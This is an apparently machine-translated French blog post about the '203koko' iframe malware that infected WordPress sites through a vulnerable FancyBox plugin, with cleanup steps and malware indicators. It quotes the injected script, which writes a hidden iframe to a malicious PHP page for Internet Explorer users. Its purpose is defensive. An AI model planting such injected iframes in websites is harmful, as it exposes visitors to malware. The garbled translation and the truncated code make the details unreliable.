[iFrame Malware 203koko] Malware WordPress Infected Sites

Plus tôt cette semaine un certain nombre de sites et de blogs WordPress, ont reçu des avertissements logiciel malveillant par Webmasters Google.

Le problème proposé par Webmasters Google est visée à la présence d'un code / scénario logiciel malveillant iframe les sites sources.

<script> if (navigator.userAgent.match (/ msie / i)) {document.write ('<iframe src = "http: /2000koko.eu/hjnfh/ipframe2000.php "width =" 203 "height =" 2 "> </ iframe> </ div> '); } </ Script>

Il semble que ce est un vulnérabilité a plug-inacquis FancyBox pour WordPress qui, jusqu'à hier (05.02.2015) ne avait pas été mis à jour depuis longtemps.
Résoudre le problème et Désinfection des virus des sites avec ce malware, est relativement simple.
1. Désactiver le plug-in FancyBox.
2. Supprimer tous les fichiers plugin FancyBox du serveur (via FTP)
3. Installez la nouvelle version du plugin (Fancybox 3.0.4)

Fancybox pour WordPress 3.0.4

- Renommé le paramètre affecté par le problème de sécurité mentionné dans 3.0.3. Cela devrait empêcher le code malveillant d'apparaître sur les sites où le plug-in est mis à jour sans supprimer le code malveillant.

Fancybox pour WordPress 3.0.3

- Correction d'un problème de sécurité.

Informations sur les logiciels malveillants:

TYPE: redirection Iframe
TARGET: WordPress Fancybox
DOMAINE Malware: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
RAW code malveillant: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = hauteur "20" = "30"> </ iframe>
MALWARE SCRIPT: <script> if (navigator.userAgent.match (/ / i) MSIE) {document.write ('<div style = "position: absolute; gauche: -2000px; largeur: 2000px">

Supprimer les logiciels malveillants de votre site WordPress.

[iFrame Malware 203koko] Malware WordPress Infected Sites

A propos de l'auteur

furtif LP

Fondateur et rédacteur infiltration SettingsDate 2006.
Expérience sur les systèmes d'exploitation Linux (en particulier CentOS), Mac OS X, Windows XP> Windows 10 et WordPress (CMS).

Laisser un commentaire